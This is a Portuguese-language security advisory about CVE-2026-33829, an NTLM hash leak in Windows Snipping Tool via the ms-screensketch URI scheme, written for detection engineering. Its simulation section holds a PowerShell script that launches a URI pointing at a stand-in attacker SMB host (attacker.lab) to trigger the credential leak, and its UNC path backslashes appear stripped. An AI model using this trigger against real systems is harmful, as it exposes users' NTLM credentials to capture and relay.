SOC Prime Bias: Crítico

21 Apr 2026 15:30 UTC

CVE-2026-33829: Vazamento de NTLM da Ferramenta de Recorte

Author Photo
SOC Prime Team linkedin icon Seguir
CVE-2026-33829: Vazamento de NTLM da Ferramenta de Recorte
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Uma vulnerabilidade na Ferramenta de Recorte do Windows pode expor hashes Net-NTLM do usuário atualmente logado para um atacante remoto. O problema é acionado por meio de um link profundo malicioso que explora o ms-screensketch esquema de URI, fazendo com que a Ferramenta de Recorte abra um arquivo hospedado em um compartilhamento SMB controlado pelo atacante. Embora a vítima precise clicar ou abrir o link criado, o vazamento de credenciais acontece de forma silenciosa em segundo plano quando o Windows inicia a conexão SMB. Esse comportamento pode dar aos atacantes acesso aos dados de desafio-resposta NTLM sem qualquer aviso visível para o usuário.

Investigação

Pesquisadores descobriram que o ms-screensketch protocolo aceita um filePath parâmetro e não restringe adequadamente caminhos UNC arbitrários. Quando a Ferramenta de Recorte tenta acessar esse caminho, o Windows tenta automaticamente autenticar-se no servidor SMB remoto, expondo a resposta NTLM no processo. Para validar o problema, os pesquisadores construíram scripts de prova de conceito que lançaram um listener SMB e geraram um URI malicioso capaz de capturar o hash vazado.

Mitigação

A Microsoft lançou uma atualização de segurança em 14 de abril de 2026 para resolver o problema removendo o comportamento vulnerável de link profundo da Ferramenta de Recorte. Aplicar esse patch impede que o aplicativo abra automaticamente caminhos SMB fornecidos por atacantes por meio de URIs não confiáveis. As organizações devem priorizar a implementação da atualização nos sistemas Windows afetados para eliminar a exposição.

Resposta

Os defensores devem monitorar tentativas de invocar o ms-screensketch esquema de URI e observar conexões SMB de saída para hosts internos ou externos incomuns. Sistemas que não requerem a Ferramenta de Recorte devem ter o protocolo restrito sempre que possível, e a implantação do patch deve ser aplicada sem demora. Qualquer hash NTLM exposto deve ser investigado rapidamente para sinais de replay, relay ou outro abuso subsequente.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria & Baseline deve ter sido aprovado.

Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa e Comandos do Ataque:

    Um atacante obteve uma posição no estação de trabalho da vítima e deseja coletar hashes NTLM sem levantar suspeitas. Aproveitando a CVE‑2026‑33829, o atacante elabora um URI ms‑screensketch: que aponta para um compartilhamento SMB controlado pelo atacante (attacker.labsharepayload.png). Quando a Ferramenta de Recorte processa esse URI, o Windows inicia automaticamente uma conexão SMB com o servidor remoto, vazando a resposta NTLM da máquina. O atacante executa o URI via PowerShell para garantir que a Ferramenta de Recorte seja invocada no contexto do usuário.

  • Script de Teste de Regressão:

    # Vazamento de NTLM via Ferramenta de Recorte – script de acionamento
    # Ajuste o caminho UNC para apontar para o seu listener controlado.
    $attackerServer = "attacker.lab"
    $sharePath      = "sharepayload.png"
    $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath"
    
    Write-Host "Invocando Ferramenta de Recorte com URI malicioso..."
    Start-Process $uri
    
    # Aguarde alguns segundos para a conclusão do handshake SMB
    Start-Sleep -Seconds 5
    
    Write-Host "Invocação completa. Verifique o SIEM para EventID 3 com DestinationHostname contendo '$attackerServer'."
  • Comandos de Limpeza:

    # Remova quaisquer processos residuais da Ferramenta de Recorte (se ainda estiverem em execução)
    Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue |
      Stop-Process -Force
    
    # Opcional: exclua arquivos temporários criados no lado do atacante (se houver)
    # (Supondo que você tenha acesso de gravação ao compartilhamento)
    # Remove-Item -Path "$attackerServer$sharePath" -Force